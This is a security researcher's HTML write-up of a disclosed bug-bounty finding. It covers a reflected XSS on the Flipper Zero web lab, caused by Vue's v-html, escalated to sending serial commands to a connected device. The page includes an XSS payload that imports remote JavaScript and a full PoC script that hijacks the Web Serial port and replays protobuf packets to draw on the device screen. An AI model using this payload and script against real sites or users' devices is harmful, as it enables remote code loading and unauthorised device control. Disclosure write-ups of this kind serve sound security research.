<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		html {
			background: url('/4rt3/g3n3r4t1v3/sketch_220308a/out.gif') no-repeat center/100% fixed;
		}
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>XSS 2 RCE on Flipper Zero</h1>
<p>1670465161</p>
<p>Got RCE through an XSS on lab.flipper.net, here's the writeup</p>
<p><a href="https://lude.rs/h4ck1ng/img/flipper_rce_poc.mp4">PoC Video, printing 1337 on the screen</a></p>
<p>Was installing the unleashed firmware on my flipper and notice that the "channel" parameter was being reflected on the dropdown. Being the nerd I am, injected an <code>&lt;img/src/onerror=alert(1)&gt;</code> (<a href="https://tinyxss.terjanq.me/">https://tinyxss.terjanq.me/</a>) tag and boom XSS</p>
<p><img alt="xss alert" src="https://lude.rs/h4ck1ng/img/veMxVtC.jpg" /></p>
<p>The vulnerability occurs because of the "v-html" directive of Vue.js on the page 
<code>&lt;q-item-label v-html="scope.opt.label" /&gt;</code></p>
<p><a href="https://vuejs.org/api/built-in-directives.html#v-html">https://vuejs.org/api/built-in-directives.html#v-html</a></p>
<p>alert() is boring, let's get RCE! The website is used to interface with your Flipper Zero  install new apps, update the firmware, etc.  This is done using the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Serial_API">Web Serial API</a>, an experimental API to read/write serial devices, what could go wrong? </p>
<p>The website has to ask the user for permission to connect, like for the webcam, but we can assume that the user already accepted because the XSS won't show if the flipper isn't connected. So I went to read how the serial communication is done on <a href="https://github.com/flipperdevices/lab.flipper.net">https://github.com/flipperdevices/lab.flipper.net</a></p>
<p>Looks like if we can execute <code>screenFrame(data)</code> the application will send a command to flipper display on the screen, which is enough for the PoC. The problem was that everything was wrapped with <a href="https://webpack.js.org/">Webpack</a>. Spent a lot of time debugging trying to find globally accessible objects and oh boi was impossible (accepting tips). Having gave up to use the app's own code, I had to made my payload to directly communicate via serial with flipper.
So I just open a <code>navigator.serial.getPorts()</code> and communicate with it, right? Wrong, the port is already being used and I can't get the reference of it because of <a href="https://webpack.js.org/">Webpack</a>. My workaround was to disconnect it and connect again, doing a <code>.click()</code> on the disconnect button (fuck webpack) Now we just need to send the right data to the flipper aaaaaaand ... the protocol is undocumented, nice. It uses <a href="https://developers.google.com/protocol-buffers">ProtoBuf</a> which is not that hard to understand but what an overkill of a protocol does flipper have gosh (actually amazing). <a href="https://github.com/flipperdevices/flipperzero-protobuf">https://github.com/flipperdevices/flipperzero-protobuf</a> </p>
<p>To simplify the PoC I just did all the steps on the application itself and <code>console.log()</code> the shit out of it, had to use <a href="https://portswigger.net/bappstore/42680f96fc214513bc5211b3f25fd98b">HTTP Mock</a> to change the js to properly get all the "packets" since it was too fast. Also had to manually edit the 3rd byte of every packet on the final payload, because it's incremental (guessing powers), btw every connection begins with <code>start_rpc_session\r</code>. Not sure what every byte is, but the biggest byte array is a bmp representation of the <code>1337</code> on screen. Then just replayed the data to the serial.</p>
<p><a href="https://github.com/caioluders/pocs/blob/main/flipper_rce_xss.js">https://github.com/caioluders/pocs/blob/main/flipper_rce_xss.js</a></p>
<pre class="codehilite"><code class="language-javascript">// payload : &lt;img/src/onerror=import('https://lude.rs/pocs/flipper_rce_xss.js')&gt;

const sleep = ms =&gt; new Promise(r =&gt; setTimeout(r, ms));


setTimeout( async() =&gt; {

    // disconnect current serial ;
    document.querySelector(&quot;#q-app &gt; div &gt; header &gt; div &gt; button&quot;).click();

    await sleep(100);

    try {
        document.querySelector(&quot;body &gt; div:nth-child(3) &gt; div &gt; div &gt; div.column.items-center &gt; button&quot;).click();
    } catch {
        document.querySelector(&quot;body &gt; div:nth-child(4) &gt; div &gt; div &gt; div.column.items-center &gt; button&quot;).click();
    }

    await sleep(500);

    var ports = await navigator.serial.getPorts();
    var pwn = await ports[0].open({baudRate:1});
    var payload = [
        new Uint8Array([115,116,97,114,116,95,114,112,99,95,115,101,115,115,105,111,110,13]).buffer, // start_rpc_session\r
        new Uint8Array([4,8,1,42,0]).buffer,
        new Uint8Array([5,8,2,130,2,0]).buffer,
        new Uint8Array([10, 8, 3, 58, 6, 10, 4, 47, 101, 120, 116]).buffer,
        new Uint8Array([11, 8, 4, 226, 1, 6, 10, 4, 47, 101, 120, 116]).buffer,
        new Uint8Array([5,8,5,210,1,0]).buffer,
        new Uint8Array([9,8,6,186,1,4,8,4,16,0]).buffer,
        new Uint8Array([9,8,7,186,1,4,8,4,16,2]).buffer,
        new Uint8Array([9,8,8,186,1,4,8,4,16,1]).buffer,
        new Uint8Array([137,8,8,9,178,1,131,8,10,128,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,48,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,144,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,136,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,140,0,0,0,0,0,0,0,248,255,255,0,0,0,0,0,132,0,0,0,0,0,0,0,0,0,128,7,0,0,0,0,196,0,252,31,0,0,0,0,0,0,0,8,0,0,0,0,68,0,0,96,0,0,0,0,0,0,0,16,0,0,0,0,70,0,0,64,0,224,255,3,0,0,0,96,0,0,0,0,66,0,0,128,0,0,0,4,0,0,0,64,0,0,0,0,66,0,0,0,1,0,0,4,0,0,0,64,0,0,0,0,66,0,0,0,1,0,0,4,0,0,0,64,0,0,0,0,66,0,0,0,1,0,0,4,0,0,0,64,0,0,0,0,66,0,0,0,1,0,0,4,0,0,0,64,0,0,0,0,66,0,0,0,1,0,0,2,0,0,0,64,0,0,0,0,64,0,0,192,0,0,224,7,0,0,0,64,0,0,0,0,64,0,0,255,1,0,56,8,0,0,0,64,0,0,0,0,64,0,0,0,2,0,0,16,0,0,0,64,0,0,0,0,64,0,0,0,2,0,0,16,0,0,0,64,0,0,0,0,64,0,0,0,4,0,0,16,0,0,0,32,0,0,0,0,64,0,0,0,8,0,0,32,0,0,0,32,0,0,0,0,64,0,0,0,8,0,0,32,0,0,0,32,0,0,0,0,64,0,0,0,8,0,0,32,0,0,240,255,255,3,0,0,32,0,0,0,8,0,0,16,0,0,0,32,0,0,0,0,32,0,0,0,8,0,1,12,0,0,0,48,0,0,0,0,32,0,0,0,4,0,1,6,0,0,0,16,0,0,0,0,32,0,0,2,3,0,227,1,0,0,0,16,0,0,0,0,32,0,0,254,1,0,60,0,0,0,0,16,0,0,0,0,32,0,0,0,0,0,0,0,0,0,0,16,0,0,0,0,32,4,0,0,0,0,0,0,0,0,0,16,0,0,0,0,248,7,0,0,0,0,0,0,0,0,0,16,0,0,0,128,63,0,0,0,0,0,0,0,0,0,0,16,0,0,0,0,32,0,0,0,0,0,0,0,0,0,0,24,0,0,0,0,32,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]).buffer,
        new Uint8Array([9,8,10,186,1,4,8,4,16,0]).buffer,
        new Uint8Array([9,8,11,186,1,4,8,4,16,2]).buffer,
        new Uint8Array([9,8,12,186,1,4,8,4,16,1]).buffer
    ];

    for (var i = 0; i &lt; payload.length; i++) {
        await sleep(100);

        var writer = await ports[0].writable.getWriter() ; 
        await writer.write(payload[i]);
        await writer.close();
    }



    console.log('done');

},500);
</code></pre>

<p>What a wonderful era we live in, where XSS can get you RCE on an embedded device (ಥ﹏ಥ)</p>
<p>Shout out to hunter.dev for dealing with the disclosure process. <a href="https://huntr.dev/bounties/03ce4392-c715-4127-af9b-e647d64fdd38/">https://huntr.dev/bounties/03ce4392-c715-4127-af9b-e647d64fdd38/</a></p></body><hr>by <a href='https://twitter.com/caioluders'>@caioluders</a></html>